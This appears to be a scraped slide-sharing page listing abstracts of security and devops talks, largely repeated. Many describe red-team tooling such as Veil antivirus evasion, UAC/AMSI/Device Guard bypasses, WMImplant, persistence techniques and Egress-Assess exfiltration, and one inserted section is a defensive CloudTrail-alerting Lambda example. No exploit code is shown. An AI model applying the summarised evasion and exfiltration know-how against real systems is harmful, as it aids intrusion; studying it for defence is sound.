This talk speaks to Aggressor, which is a scripting language that comes with Cobalt Strike. We've created or captured other public scripts into a single repository that shows how Aggressor, and automation, can be used in every part of a red team or pen test.
https://github.com/FortyNorthSecurity/AggressorAssessor
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
CTruncer
This slide deck was presented at BlackHat USA 2019 Arsenal and is titled WMImplant: An Offensive Use Case of WMI. This covers how WMImplant weaponizes WMI.
To generate an attack or anti-malware report from Deep Security Manager in PDF format, select the report type from the Single Report tab under Events and Reports, choose all tag filters and the desired time frame and computers, optionally add encryption, and click Generate.
The document discusses different types of bugs at various stages of development and production. It provides strategies for preventing bugs including writing unit tests, automating processes, monitoring systems, and working smarter by refactoring code and documenting assumptions. When bugs occur in production, it recommends gathering detailed bug reports, profiling code with Xdebug, tracing code execution, and potentially remote debugging to identify issues. However, remote debugging should only be used temporarily due to performance impacts and confidentiality concerns. The document concludes with a plug for the author's company which provides application development and monitoring services.
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless of whether these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions, such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
This document provides a summary of best practices for securing AWS environments. It discusses common issues like exposed credentials, misconfigured services, and vulnerable systems that can lead to account exploitation.
The document recommends implementing monitoring with AWS services like CloudWatch, CloudTrail and Config to detect threats. It also advises hardening AWS security by not using the root account, auditing IAM policies, enabling multi-factor authentication, using IAM roles instead of long-term access keys, and monitoring for unauthorized API access or root account usage. Specific techniques are demonstrated like creating a CloudWatch event rule to send unauthorized IAM events to Lambda for analysis.
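The last sentence describes the detection pattern: a CloudWatch Events (EventBridge) rule forwards CloudTrail records to a Lambda function, which decides whether they are worth an alert. Below is an added example of such a function, not code from the summarised deck. It assumes two rule patterns (one for failed, unauthorized API calls, one for root account activity) with this function as their target; the CloudTrail field names used (errorCode, userIdentity.type, userIdentity.invokedBy, eventSource, eventName) are the documented ones, and the sample events at the bottom are constructed for the example.

```python
"""Triage CloudTrail records delivered by a CloudWatch Events rule.

Added example (not the summarised deck's code). Pure standard library so it
runs offline; in a real deployment the returned summary would go to SNS or a
ticketing system instead of just being logged.
"""
import json
from typing import Dict, List, Optional

# Assumed rule patterns. Matching on the error code in the rule keeps the
# function from being invoked for every successful API call in the account.
RULE_PATTERNS = {
    "unauthorized-api-calls": {
        "detail-type": ["AWS API Call via CloudTrail"],
        "detail": {
            "errorCode": [{"prefix": "AccessDenied"}, "Client.UnauthorizedOperation"]
        },
    },
    "root-account-usage": {
        "detail-type": ["AWS API Call via CloudTrail",
                        "AWS Console Sign In via CloudTrail"],
        "detail": {"userIdentity": {"type": ["Root"]}},
    },
}

UNAUTHORIZED_PREFIXES = ("AccessDenied",)          # AccessDenied, AccessDeniedException
UNAUTHORIZED_SUFFIXES = ("UnauthorizedOperation",)  # Client.UnauthorizedOperation


def is_unauthorized(record: Dict) -> bool:
    """True when the API call failed an authorization check."""
    code = record.get("errorCode") or ""
    return code.startswith(UNAUTHORIZED_PREFIXES) or code.endswith(UNAUTHORIZED_SUFFIXES)


def is_root_usage(record: Dict) -> bool:
    """True for interactive root use.

    Calls an AWS service makes on the account's behalf also carry a Root
    identity but include userIdentity.invokedBy; those are not a person
    logging in as root, so they are excluded.
    """
    ident = record.get("userIdentity", {})
    return ident.get("type") == "Root" and "invokedBy" not in ident


def classify(record: Dict) -> List[str]:
    findings = []
    if is_unauthorized(record):
        findings.append("unauthorized_api_call")
    if is_root_usage(record):
        findings.append("root_account_usage")
    return findings


def summarize(record: Dict) -> Dict:
    """Flatten the fields an analyst needs first."""
    ident = record.get("userIdentity", {})
    return {
        "time": record.get("eventTime"),
        "principal": ident.get("arn") or ident.get("type"),
        "source_ip": record.get("sourceIPAddress"),
        "call": f"{record.get('eventSource')}:{record.get('eventName')}",
        "error": record.get("errorCode"),
        "findings": classify(record),
    }


def lambda_handler(event: Dict, context=None) -> Optional[Dict]:
    """Lambda entry point; the CloudTrail record sits under event['detail']."""
    summary = summarize(event.get("detail", {}))
    if not summary["findings"]:
        return None
    print(json.dumps(summary))  # lands in CloudWatch Logs
    return summary


# Constructed sample events in the shape CloudWatch Events delivers.
SAMPLE_DENIED = {
    "detail-type": "AWS API Call via CloudTrail",
    "detail": {
        "eventTime": "2019-08-07T14:02:11Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "errorCode": "AccessDenied",
        "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser",
                         "arn": "arn:aws:iam::123456789012:user/dev-ci"},
    },
}
SAMPLE_ROOT = {
    "detail-type": "AWS Console Sign In via CloudTrail",
    "detail": {
        "eventTime": "2019-08-07T15:30:00Z",
        "eventSource": "signin.amazonaws.com",
        "eventName": "ConsoleLogin",
        "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "Root", "arn": "arn:aws:iam::123456789012:root"},
    },
}
SAMPLE_BENIGN = {
    "detail-type": "AWS API Call via CloudTrail",
    "detail": {
        "eventTime": "2019-08-07T15:31:00Z",
        "eventSource": "s3.amazonaws.com",
        "eventName": "ListBuckets",
        "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser",
                         "arn": "arn:aws:iam::123456789012:user/dev-ci"},
    },
}

if __name__ == "__main__":
    for sample in (SAMPLE_DENIED, SAMPLE_ROOT, SAMPLE_BENIGN):
        lambda_handler(sample)
```

The prefix/suffix checks in the function deliberately mirror the rule pattern, so a record that slips through a looser rule (or arrives from a second rule) is still judged the same way; the `invokedBy` exclusion is what keeps service-initiated root sessions from paging someone at 3 a.m.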
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
enigma0x3
This document summarizes Matt Nelson's presentation on security boundaries and feature bypasses in Microsoft software. Some key points include:
- Security boundaries are not always clearly defined and what is/isn't a boundary can discourage researchers from reporting issues.
- Attackers don't care about boundaries and will exploit any feature or bypass that raises their chances of success.
- Examples of feature bypasses like Outlook forms, OLE, and UAC show how Microsoft has improved at issuing fixes for non-boundaries in the name of defense in depth.
- Technologies like AMSI, Device Guard, and UAC still have bypasses but increasing costs for attackers through fixes is worthwhile even if not a strict boundary.
- The call
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This document introduces Grunt, an open source task automation tool built on Node.js that helps manage tasks like compiling code, running tests, building packages and more. It discusses how Grunt uses plugins to extend its functionality, manages dependencies, and allows automating and standardizing common development workflows through a Gruntfile and package.json. The document provides examples of popular Grunt plugins and demonstrates how to set up a sample Grunt project from scratch.
Adversarial Post-Ex: Lessons From The Pros
Justin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to realistically emulate adversaries for red team assessments.
Up is Down, Black is White: Using SCCM for Wrong and Right
enigma0x3
This document discusses using Microsoft's System Center Configuration Manager (SCCM) for both offensive and defensive purposes. It introduces PowerSCCM, a PowerShell toolkit for interacting with SCCM. PowerSCCM can be used to create malicious applications and deploy them to targeted collections of machines. It also provides cmdlets for hunting for compromised users and systems. The document recommends tuning SCCM for improved host-based security monitoring and inventory capabilities. It provides examples of using SCCM data for incident response and hunting activities on the network.
XP Days 2019: First secret delivery for modern cloud-native applications
Vlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Continuous Integration using Cruise Control
elliando dias
The document discusses Continuous Integration using Cruise Control. It defines Continuous Integration as integrating source code and running tests after each commit to the source repository to provide near-immediate feedback. Cruise Control runs builds whenever code is committed, allows scheduling nightly builds, and notifies users of build results to simplify release management. While Cruise Control automates the build process, developers must still write the build scripts and unit tests.
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
CODE BLUE
The Cyber Grand Challenge (CGC) was announced in 2013, a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified for the final round. These 7 teams competed against each other to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code or to humans.
This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.
In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.
--- Tyler Nighswander
Tyler has been a computer hacker for several years. While an undergraduate student at Carnegie Mellon University, Tyler was one of the initial members of the hacking team known as the Plaid Parliament of Pwning. This team rose from a small group of students to the number one competitive hacking team in the world. After traveling around the world competing in hacking competitions, Tyler settled down and now works on making humans and computers think more like hackers at ForAllSecure. In 2016, the automated system he helped create won the DARPA Cyber Grand Challenge.
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
"All happy cloud deployments are alike; each unhappy cloud deployment is unhappy in its own way." — Leo Tolstoy, Site Reliability Engineer
At Gruntwork, I've had the chance to see the cloud adoption journeys of hundreds of companies, from tiny startups to Fortune 50 giants. I've seen those journeys go well. I've seen those journeys go poorly. In this talk, I discuss a few of the ways cloud adoption can go horribly wrong (massive cost overruns, endless death marches, security disasters), and more importantly, how you can get it right.
To help you get it right, we looked at the cloud journeys that were successful and extracted from them the patterns they had in common. We distilled all this experience down into something called the Gruntwork Production Framework, which defines five concrete steps you can follow to adopt the cloud at your own company—and hopefully, to end up with your very own happy cloud deployment.
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays
apidays LIVE New York - API for Legacy Industries: Banking, Insurance, Healthcare and Retail
Navigating the Sea of Javascript Tools to Discover Scalable Tools for Continuous Delivery
Menelaos Kotsollaris, Senior Software Engineer
Viki Green, Senior Software Developer at Trulioo
This document provides an introduction and overview of GruntJS, including:
- What GruntJS is and why it is useful for JavaScript projects
- How to set up GruntJS and install its dependencies
- An explanation of basic GruntJS concepts like tasks, configuration, and plugins
- Examples of creating simple GruntJS tasks and using features like warnings, logs, and asynchronous calls
- A discussion of common files and operations in GruntJS like reading, writing, copying, and deleting files
The document serves as a tutorial for getting started with GruntJS and demonstrates some of its core capabilities.
Ever Present Persistence - Established Footholds Seen in the Wild
CTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
SEC303 Automating Security in cloud Workloads with DevSecOps
Amazon Web Services
This session is designed to teach security engineers, developers, solutions architects, and other technical security practitioners how to use a DevSecOps approach to design and build robust security controls at cloud-scale. This session walks through the design considerations of operating high-assurance workloads on top of the AWS platform and provides examples of how to automate configuration management and generate audit evidence for your own workloads. We’ll discuss practical examples using real code for automating security tasks, then dive deeper to map the configurations against various industry frameworks. This advanced session showcases how continuous integration and deployment pipelines can accelerate the speed of security teams and improve collaboration with software development teams.
At Fluent Conference 2018, Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. They also share tools to help you decide if a library’s risks and unseen costs are worth it.
When Third Parties Stop Being Polite... and Start Getting Real
Nicholas Jansma
By Nic Jansma and Charlie Vazac (Akamai)
Fluent 2018
Would you give the Amazon Prime delivery robot the key to your house, just because it stops by to deliver delicious packages every day? Even if you would, do you still have 100% confidence that it wouldn’t accidentally drag in some mud, let the neighbor in, steal your things, or burn your house down? Worst-case scenarios such as these are what you should be planning for when deciding whether or not to include third-party libraries and services on your website. While most libraries have good intentions, by including them on your site, you have given them complete control over the kingdom. Once on your site, they can provide all of the great services you want—or they can destroy everything you’ve worked so hard to build.
It’s prudent to be cautious: we’ve all heard stories about how third-party libraries have caused slowdowns, broken websites, and even led to downtime. But how do you evaluate the actual costs and potential risks of a third-party library so you can balance that against the service it provides? Every library requires nonzero overhead to provide the service it claims. In many cases, the overhead is minimal and justified, but we should quantify it to understand the real cost. In addition, libraries need to be carefully crafted so they can avoid causing additional pain when the stars don’t align and things go wrong.
Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. From how the library is loaded, to the moment it phones home, you’ll see how third-parties can affect the host page and discover best practices you can follow to ensure they do the least potential harm.
With all of the great performance tools available to developers today, we’ve gained a lot of insight into just how much third-party libraries are impacting our websites. Nic and Charles detail tools to help you decide if a library’s risks and unseen costs are worth it. While you may not have the time to perform a deep dive into every third-party library you want to include on your site, you’ll leave with a checklist of the most important best practices third-parties should be following for you to have confidence in them.
Worse Is Better, for Better or for Worse
Kevlin Henney
Presented at GeeCON (15th May 2014)
Over two decades ago, Richard Gabriel proposed the idea of “Worse Is Better” to explain why some things that are designed to be pure and perfect are eclipsed by solutions that are seemingly compromised and imperfect. This is not simply the observation that things should be better but are not, or that flawed and ill-considered solutions are superior to those created with intention, but that many solutions that are narrow and incomplete work out better than the solutions conceived of as being comprehensive and complete. Whether it is programming languages, operating systems, development processes or development practices, we find many examples of this in software development, some more provocative and surprising than others.
In this talk we revisit the original premise and question, and look at how this approach to development can still teach us something surprising and new.
Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
You only have to change one thing to do the DevOps, everything
Ken Mugrage
In this talk I point out several areas of focus when making the transition to a DevOps culture, and point out why it’s important that you change everything.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
CTruncer
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
This is the talk given at NullCon 2017. This talk gives a history of the Veil Framework and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 was released in this talk.
More Related Content
Similar to Aggressive Autonomous Actions - Operating with Automation
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This document introduces Grunt, an open source task automation tool built on Node.js that helps manage tasks like compiling code, running tests, building packages and more. It discusses how Grunt uses plugins to extend its functionality, manages dependencies, and allows automating and standardizing common development workflows through a Gruntfile and package.json. The document provides examples of popular Grunt plugins and demonstrates how to set up a sample Grunt project from scratch.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to realistically emulate adversaries for red team assessments.
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
This document discusses using Microsoft's System Center Configuration Manager (SCCM) for both offensive and defensive purposes. It introduces PowerSCCM, a PowerShell toolkit for interacting with SCCM. PowerSCCM can be used to create malicious applications and deploy them to targeted collections of machines. It also provides cmdlets for hunting for compromised users and systems. The document recommends tuning SCCM for improved host-based security monitoring and inventory capabilities. It provides examples of using SCCM data for incident response and hunting activities on the network.
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Continuous Integration using Cruise Controlelliando dias
The document discusses Continuous Integration using Cruise Control. It defines Continuous Integration as integrating source code and running tests after each commit to the source repository to provide near-immediate feedback. Cruise Control runs builds whenever code is committed, allows scheduling nightly builds, and notifies users of build results to simplify release management. While Cruise Control automates the build process, developers must still write the build scripts and unit tests.
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...CODE BLUE
The Cyber Grand Challenge (CGC) was announced in 2013--a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified to the final round. These 7 teams competed against eachother to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code nor access to humans.
This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.
In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.
--- Tyler Nighswander
Tyler has been a computer hacker for several years. While an undergraduate student at Carnegie Mellon University, Tyler was one of the initial members of the hacking team known as the Plaid Parliament of Pwning. This team rose from a small group of students to the number one competitive hacking team in the world. After traveling around the world competing in hacking competitions, Tyler settled down and now works on making humans and computers think more like hackers at ForAllSecure. In 2016, the automated system he helped create won the DARPA Cyber Grand Challenge.
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions (Yevgeniy Brikman)
"All happy cloud deployments are alike; each unhappy cloud deployment is unhappy in its own way." — Leo Tolstoy, Site Reliability Engineer
At Gruntwork, I've had the chance to see the cloud adoption journeys of hundreds of companies, from tiny startups to Fortune 50 giants. I've seen those journeys go well. I've seen those journeys go poorly. In this talk, I discuss a few of the ways cloud adoption can go horribly wrong (massive cost overruns, endless death marches, security disasters), and more importantly, how you can get it right.
To help you get it right, we looked at the cloud journeys that were successful and extracted from them the patterns they had in common. We distilled all this experience down into something called the Gruntwork Production Framework, which defines five concrete steps you can follow to adopt the cloud at your own company—and hopefully, to end up with your very own happy cloud deployment.
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc... (apidays)
apidays LIVE New York - API for Legacy Industries: Banking, Insurance, Healthcare and Retail
Navigating the Sea of Javascript Tools to Discover Scalable Tools for Continuous Delivery
Menelaos Kotsollaris, Senior Software Engineer
Viki Green, Senior Software Developer at Trulioo
This document provides an introduction and overview of GruntJS, including:
- What GruntJS is and why it is useful for JavaScript projects
- How to set up GruntJS and install its dependencies
- An explanation of basic GruntJS concepts like tasks, configuration, and plugins
- Examples of creating simple GruntJS tasks and using features like warnings, logs, and asynchronous calls
- A discussion of common files and operations in GruntJS like reading, writing, copying, and deleting files
The document serves as a tutorial for getting started with GruntJS and demonstrates some of its core capabilities.
Ever Present Persistence - Established Footholds Seen in the Wild (CTruncer)
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class (Rob Fuller)
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
SEC303 Automating Security in cloud Workloads with DevSecOps (Amazon Web Services)
This session is designed to teach security engineers, developers, solutions architects, and other technical security practitioners how to use a DevSecOps approach to design and build robust security controls at cloud-scale. This session walks through the design considerations of operating high-assurance workloads on top of the AWS platform and provides examples of how to automate configuration management and generate audit evidence for your own workloads. We’ll discuss practical examples using real code for automating security tasks, then dive deeper to map the configurations against various industry frameworks. This advanced session showcases how continuous integration and deployment pipelines can accelerate the speed of security teams and improve collaboration with software development teams.
At Fluent Conference 2018, Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. They also share tools to help you decide if a library’s risks and unseen costs are worth it.
When Third Parties Stop Being Polite... and Start Getting Real (Nicholas Jansma)
By Nic Jansma and Charlie Vazac (Akamai)
Fluent 2018
Would you give the Amazon Prime delivery robot the key to your house, just because it stops by to deliver delicious packages every day? Even if you would, do you still have 100% confidence that it wouldn’t accidentally drag in some mud, let the neighbor in, steal your things, or burn your house down? Worst-case scenarios such as these are what you should be planning for when deciding whether or not to include third-party libraries and services on your website. While most libraries have good intentions, by including them on your site, you have given them complete control over the kingdom. Once on your site, they can provide all of the great services you want—or they can destroy everything you’ve worked so hard to build.
It’s prudent to be cautious: we’ve all heard stories about how third-party libraries have caused slowdowns, broken websites, and even led to downtime. But how do you evaluate the actual costs and potential risks of a third-party library so you can balance that against the service it provides? Every library requires nonzero overhead to provide the service it claims. In many cases, the overhead is minimal and justified, but we should quantify it to understand the real cost. In addition, libraries need to be carefully crafted so they can avoid causing additional pain when the stars don’t align and things go wrong.
Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. From how the library is loaded, to the moment it phones home, you’ll see how third-parties can affect the host page and discover best practices you can follow to ensure they do the least potential harm.
With all of the great performance tools available to developers today, we’ve gained a lot of insight into just how much third-party libraries are impacting our websites. Nic and Charles detail tools to help you decide if a library’s risks and unseen costs are worth it. While you may not have the time to perform a deep dive into every third-party library you want to include on your site, you’ll leave with a checklist of the most important best practices third-parties should be following for you to have confidence in them.
Worse Is Better, for Better or for Worse (Kevlin Henney)
Presented at GeeCON (15th May 2014)
Over two decades ago, Richard Gabriel proposed the idea of “Worse Is Better” to explain why some things that are designed to be pure and perfect are eclipsed by solutions that are seemingly compromised and imperfect. This is not simply the observation that things should be better but are not, or that flawed and ill-considered solutions are superior to those created with intention, but that many solutions that are narrow and incomplete work out better than the solutions conceived of as being comprehensive and complete. Whether it is programming languages, operating systems, development processes or development practices, we find many examples of this in software development, some more provocative and surprising than others.
In this talk we revisit the original premise and question, and look at how this approach to development can still teach us something surprising and new.
Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
You only have to change one thing to do the DevOps, everything (Ken Mugrage)
In this talk I point out several areas of focus when making the transition to a DevOps culture, and point out why it’s important that you change everything.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000 (CTruncer)
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
This is the talk given at NullCon 2017. This talk gives a history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk.
Bringing Down the House - How One Python Script Ruled Over AntiVirus (CTruncer)
This talk is about how a single python tool (Veil aka Veil-Evasion) is able to render AntiVirus useless. Veil's goal is to bypass antivirus products on workstations and servers.
A Battle Against the Industry - Beating Antivirus for Meterpreter and More (CTruncer)
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
What Goes In Must Come Out: Egress-Assess and Data Exfiltration (CTruncer)
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
Egress-Assess and Owning Data Exfiltration (CTruncer)
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
EyeWitness - A Web Application Triage Tool (CTruncer)
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
Enhancing adoption of Open Source Libraries. A case study on Albumentations.AI (Vladimir Iglovikov, Ph.D.)
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
